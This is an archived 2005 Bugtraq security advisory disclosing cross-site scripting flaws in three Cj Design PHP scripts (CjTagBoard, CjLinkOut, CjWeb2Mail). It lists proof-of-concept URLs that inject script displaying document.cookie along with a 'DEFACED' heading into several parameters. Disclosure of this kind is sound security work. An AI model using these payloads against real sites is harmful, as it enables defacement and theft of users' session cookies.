Cj Desing Three Aplications One Bug

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Cj Desing Three Aplications One Bug
From: psymera@xxxxxxxxxxx
Date: 8 Sep 2005 04:33:57 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

######################################################################
[Psymera Advisory #1] CjTagBoard 3.0 - CjLinkOut 1.0 - CjWeb2Mail 3.0
######################################################################

Software:     CjTagBoard
              CjLinkOut
              CjWeb2Mail
              
Versions:     CjTagBoard =3.0
              CjLinkOut  =1.0
              CjWeb2Mail =3.0

Language:     PHP

Type:         Cross Side Script

Risc:         Low

Examples:     A] CjTagBoard XSS
              B] CjLinkOut XSS
              C] CjWeb2Mail XSS

Exploitation: remote

Date:         07 Sep 2005

Vendor:       Cj Desing
Page:         http://www.cj-design.com/

Author:       Psymera
              e-mail: psymera@xxxxxxxxxxx

######################################################################

-----------------
A] CjTagBoard XSS
-----------------
http://[target]/[folder]/details.php?date=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?time=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?name=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?ip=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?agent=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/display.php?msg=<h1>DEFACED</h1><script>alert(document.cookie);</script>

----------------
B] CjLinkOut XSS
----------------
http://[target]/[folder]/top.php?123=";><h1>hola</h1><script>alert(document.cookie);</script><

-----------------
C] CjWeb2Mail XSS
-----------------
http://[target]/[folder]/thankyou.php?name=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&name=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&message=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&show_ip=yes&ip=<h1>deface</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/web2mail.php?error_messages=yes&emsg=<h1>Deface</h1><script>alert(document.cookie);</script>

#######################################################################

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 8.0

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
=V+P0
-----END PGP PUBLIC KEY BLOCK-----

Prev by Date: (TOOL) TAPiON (Polymorphic Decryptor Generator) Engine
Next by Date: KillProcess 2.20 and priors "FileDescription" Local Buffer Overflow Issue
Previous by thread: Re: [Full-disclosure] (TOOL) TAPiON (Polymorphic Decryptor Generator) Engine
Next by thread: KillProcess 2.20 and priors "FileDescription" Local Buffer Overflow Issue
Index(es):
- Date
- Thread